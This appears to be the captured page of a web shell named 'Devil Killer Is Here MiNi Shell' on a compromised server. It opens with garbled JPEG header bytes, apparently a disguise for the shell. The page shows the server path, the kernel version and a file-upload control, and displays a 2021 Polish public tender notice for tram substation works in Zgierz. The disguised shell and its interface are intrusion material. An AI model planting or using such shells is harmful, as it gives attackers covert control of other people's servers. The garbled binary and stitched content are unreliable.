JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210531/0006916601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00069166 z dnia 2021-05-31</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie zagospodarowania terenu dla potrzeb podstacji trakcyjnej tramwajowej Zgierz Łąkowa, wykonanie projektu budowlanego i budowa zasilania podstacji trakcyjnej oraz przebudowa przystanku (...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKIE USŁUGI KOMUNIKACYJNE W ZGIERZU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Miejskie Usługi Komunikacyjne w Zgierzu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 101320867</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Jana Kilińskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@muk.zgierz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muk.zgierz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka budżetowa Gminy Miasto Zgierz </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie zagospodarowania terenu dla potrzeb podstacji trakcyjnej tramwajowej Zgierz Łąkowa, wykonanie projektu budowlanego i budowa zasilania podstacji trakcyjnej oraz przebudowa przystanku (...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-47c887be-bebe-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00069166</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/umz.zgierz/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne opisane zostały w dokumencie "Instrukcja dla wykonawców platformazakupowa.pl" oraz w „Regulaminie platformazakupowa.pl”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1) administratorem Pani/Pana danych osobowych jest:<br/>Kierownik Miejskich Usług Komunikacyjnych w Zgierzu, Pl. Kilińskiego 7, 95-100 Zgierz<br/>2) Inspektorem ochrony danych osobowych w Miejskich Usługach Komunikacyjnych w Zgierzu, jest Pan Adrian Oszajca, kontakt: iod.zgierz@gmail.com, tel.: 509 649 443<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego : Znak sprawy: MUK.1.2021 pn: Wykonanie zagospodarowania terenu dla potrzeb podstacji trakcyjnej tramwajowej Zgierz Łąkowa, wykonanie projektu budowlanego i budowa zasilania podstacji trakcyjnej oraz przebudowa przystanku Adelmówek skrzyżowanie ulic Łódzkiej i Osiedlowej, prowadzonym w trybie podstawowym z możliwością przeprowadzenia negocjacji treści ofert 4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm), dalej „ustawa Pzp”; 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych 2;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO 3;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MUK.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie zagospodarowania terenu dla potrzeb podstacji trakcyjnej tramwajowej Zgierz Łąkowa, wykonanie projektu budowlanego i budowa zasilania podstacji trakcyjnej oraz przebudowa przystanku Adelmówek skrzyżowanie ulic Łódzkiej i Osiedlowej.<br/>1. Przedmiotem zamówienia są roboty budowlane polegające na:<br/>a)	przebudowie peronu przystankowego Adelmówek (relacja Zgierz — Łódź) przy ulicy Osiedlowej wraz z wyposażeniem, na podstawie: projektu budowlanego stanowiącego (załącznik nr 1), zgłoszenia robót (załącznik nr 2), warunków technicznych (załącznik nr 3), umowy przyłączeniowej (załącznik nr 4), projektu stałej organizacji ruchu (załącznik nr 5), Specyfikacji technicznej wykonania i obioru robót budowlanych (załącznik nr 6). Przedmiar robót (załącznik nr 7), należy traktować jak materiał pomocniczy, niebędący podstawą opisu przedmiotu zamówienia i obliczenia ceny ryczałtowej.<br/>b)	wykonaniu zagospodarowania terenu dla potrzeb podstacji trakcyjnej kontenerowej, które należy realizować w oparciu o dokumentację projektową (załącznik nr 8), Specyfikację techniczną wykonania i obioru robót budowlanych (załącznik nr 9). Przedmiar robót (załącznik nr 10), należy traktować jak materiał pomocniczy, niebędący podstawą opisu przedmiotu zamówienia i obliczenia ceny ryczałtowej.<br/>2.Wykonanie zasilania podstawowego 800 kW dla podstacji będzie realizowane w formule „zaprojektuj i wybuduj” w oparciu o warunki techniczne stanowiące załącznik nr 11, umowę przyłączeniową stanowiącą załącznik nr 12, Program Funkcjonalno-Użytkowy, stanowiący załącznik nr 13.<br/>Peron przystankowy Adelmówek zlokalizowany jest w pasie drogi krajowej nr 91 ulicy Łódzkiej.<br/>Zamawiający dysponuje prawem do gruntu na mocy uzgodnień z Zarządcą Drogi (załącznik nr 14).<br/>Ulica Łąkowa objęta jest miejscowym planem zagospodarowania przestrzennego (załącznik nr 15), którego zapisy nie stanowią przeciwskazań do zlokalizowania w jej ciągu obiektu w postaci podstacji trakcyjnej.<br/>Ulica Łąkowa jest objęta gwarancją wykonawcy przebudowy tej drogi.<br/>A/ Przedmiot zamówienia w zakresie realizacji dokumentacji<br/>Dokumentacja wymagana przez Zamawiającego obejmuje m.in.:<br/>1)	opracowanie kompletnego projektu budowlanego zasilania podstawowego o mocy przyłączeniowej 800,00 kW, które należy doprowadzić do podstacji trakcyjnej tramwajowej – 4 egzemplarze w formie papierowej,<br/>2)	uzyskanie aktualnych podkładów geodezyjnych do opracowania projektu budowlanego,<br/>3)	opracowanie projektów przebudowy urządzeń infrastruktury technicznej niezwiązanej z potrzebami zarządzania drogami lub potrzebami ruchu drogowego, kolidujących z inwestycją, jeżeli takowe występują – 4 egzemplarze w formie papierowej,<br/>4)	opracowanie projektu tymczasowej organizacji ruchu,<br/>5)	opracowanie STWiORB objętych przedmiotem zamówienia zgodnie z Rozporządzeniem Ministra Infrastruktury, DZ. U. 2013.1129 tj. – 2 egzemplarze w wersji papierowej,<br/>6)	uzyskanie przez Wykonawcę w imieniu Zamawiającego decyzji o pozwoleniu na budowę lub zgłoszenia robót budowlanych niewymagających pozwolenia na budowę,<br/>7)	wersję elektroniczną dokumentacji w formatach edytowalnych i PDF – 3 egzemplarze.<br/>B/ Przedmiot zamówienia w zakresie realizacji robót<br/>Zakres rzeczowy zamówienia obejmuje:<br/>1)	przebudowę przystanku Adelmówek relacji Zgierz — Łódź, w tym:<br/>a)	wykonanie nawierzchni peronu,<br/>b)	zakup i montaż wyposażenia (oświetlenie drogowe, wiata przystankowa, ławka, kosz na śmieci),<br/>2)	zagospodarowanie terenu dla potrzeb kontenerowej podstacji trakcyjnej Zgierz Łąkowa, w tym:<br/>a)	dojazd do obiektu podstacji,<br/>b)	wykonanie infrastruktury technicznej niezbędnej do prawidłowego funkcjonowania podstacji,<br/>c)	fundamenty pod obiekt podstacji,<br/>d)	utwardzenie terenu pod podstację wraz z wykonaniem minimum 3 miejsc postojowych (minimum 3 miejsca w tym 2 dla pojazdów technicznych),<br/>e)	ogrodzenie działki.<br/>3)	zasilanie podstawowe 800 kW podstacji trakcyjnej tramwajowej.<br/>C/ Szczegółowe wymagania i warunki realizacji zamówienia<br/>l) Zamawiający zaleca przeprowadzenie wizji lokalnej w terenie przed złożeniem oferty.<br/>2)	Wykonawca poniesie wszelkie koszty związane z realizacją zamówienia. Są to opracowania kompletnej dokumentacji projektowej wraz z uzyskaniem niezbędnych decyzji, uzyskanie decyzji pozwolenia na użytkowanie jeżeli taka będzie wymagana, wykonanie stałej organizacji ruchu, koszty prób, badań, odbiorów, usunięcie występujących kolizji, regulacji pionowej studzienek kanalizacyjnych, itp.<br/>3)	Wykonawca ma obowiązek przywrócenia terenu do stanu pierwotnego.<br/>4)	Za projekt, uzgodnienie oraz wdrożenie tymczasowej organizacji na czas robót odpowiedzialny jest Wykonawca oraz poniesie koszty z nimi związane.<br/>5)	Planowane okresy realizacji od dnia podpisania umowy:<br/> a)	do 16.08.2021 r. — dla przedmiotu zamówienia obejmującego część B, pkt 2)<br/>b)	5 miesięcy od dnia zawarcia umowy — dla przedmiotu zamówienia obejmującego część A oraz część B, pkt 1) i 3).<br/> UWAGA:<br/>Zamawiający wymaga, w zakresie realizacji zamówienia przez Wykonawcę i Podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane niżej czynności:<br/>- roboty drogowe,<br/>- roboty elektryczne/elektrotechniczne,<br/>- roboty budowlane.<br/>ZAŁĄCZNIKI:<br/>1.	Dokumentacja projektowa przebudowy drogi krajowej nr 91 w zakresie tramwajowego peronu przystankowego przy ul. Osiedlowej w Zgierzu wraz z wyposażeniem.<br/>2.	Zaświadczenie o niewniesieniu sprzeciwu do zgłoszenia z dn. 19.01.2021r. znak GPB-II.7843.5.2021.AS.<br/>3.	Warunki przyłączenia nr 20-D8/WP/01829 z dn. 22.04.2020r. <br/>4.	Umowa o przyłączenie nr 20-D8/UP/01829 z dn. 19.06.2020r. <br/>5.	Projekt stałej organizacji ruchu.<br/>6.	Specyfikacja techniczna wykonania i obioru robót budowlanych.<br/>7.	Przedmiar robót. <br/>8.	Dokumentacja projektowa zagospodarowania terenu podstacji trakcyjnej tramwajowej Zgierz Łąkowa.<br/>9.	Specyfikacja techniczna wykonania i obioru robót budowlanych.<br/>10.	Przedmiar robót.<br/>11.	Warunki przyłączenia nr. 21-DO/WP/00094 z dn. 27.01.2021 r.<br/>12.	Umowa o przyłączenie nr 21-DO/UP/00094. <br/>13.	Program Funkcjonalno – Użytkowy zasilania podstacji trakcyjnej tramwajowej.<br/>14.	Umowa użyczenia z dn. 14.10.2008 r.<br/>15.	Miejscowy plan ogólnego zagospodarowania przestrzennego dla rejonu ulic 1 Maja, Łąkowej, Łódzkiej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień polegających na powtórzeniu podobnych usług lub robót budowlanych, o których mowa w art. 214 ust. 1 pkt 7 prawa zamówień publicznych w zakresie wartości do 470.000,00 zł, na warunkach – odpowiednio: - przez Wykonawcę niepodlegającego wykluczeniu; - przez Wykonawcę spełniającego, odpowiednio i proporcjonalnie do charakteru i rozmiaru zamówienia, warunki udziału w postępowaniu; - z zachowaniem, odpowiednio i proporcjonalnie do charakteru i rozmiaru zamówienia, warunków umowy, jak w postępowaniu o udzielenie zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający<br/>stosować będzie następujące kryteria oceny ofert: cena, okres gwarancji (całkowity, ale nie dłuższy niż 10 lat), wysokość kar umownych, zatrudnienie min. 1 osoby niepełnosprawnej lub bezrobotnej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji (całkowity, ale nie dłuższy niż 10 lat)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość kar umownych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zatrudnienie min. 1 osoby niepełnosprawnej lub bezrobotnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu dotyczący zdolności do występowania w obrocie<br/>gospodarczym wg art. 113 PZP: Wykonawca prowadząc działalność gospodarczą lub<br/>zawodową jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w<br/>kraju, w którym ma siedzibę lub miejsce zamieszkania. Warunek udziału w postępowaniu<br/>dotyczący zdolności technicznej lub zawodowej, wg art. 116 PZP: Wykonawca wykonał<br/>(zakończył wykonanie) nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej<br/>1 robotę budowlaną o wartości minimum 400.000,00 zł, odpowiadającą swoim rodzajem robotom<br/>budowlanym stanowiącym przedmiot zamówienia („związaną z przedmiotem zamówienia” ), tj.<br/>roboty budowlano-konstrukcyjne, drogowe i elektryczne, potwierdzone dowodami określającymi, że te<br/>roboty zostały wykonane należycie; Zamawiający uzna wartość robót stanowiącą sumę 2 wartości wykonanych robót budowlanych, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia.<br/>Wykonawca dysponuje osobami, skierowanymi przez<br/>Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnymi za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, tj.: - co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności inżynieryjno- drogowej,<br/>- co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń elektrycznych,<br/>- co najmniej jedną osobą posiadającą uprawnienia do projektowania w zakresie sieci, instalacji i urządzeń elektrycznych <br/>- co najmniej jedną osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno budowlanej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową<br/>lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,<br/>oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokument potwierdzający, że Wykonawca jest wpisany do jednego 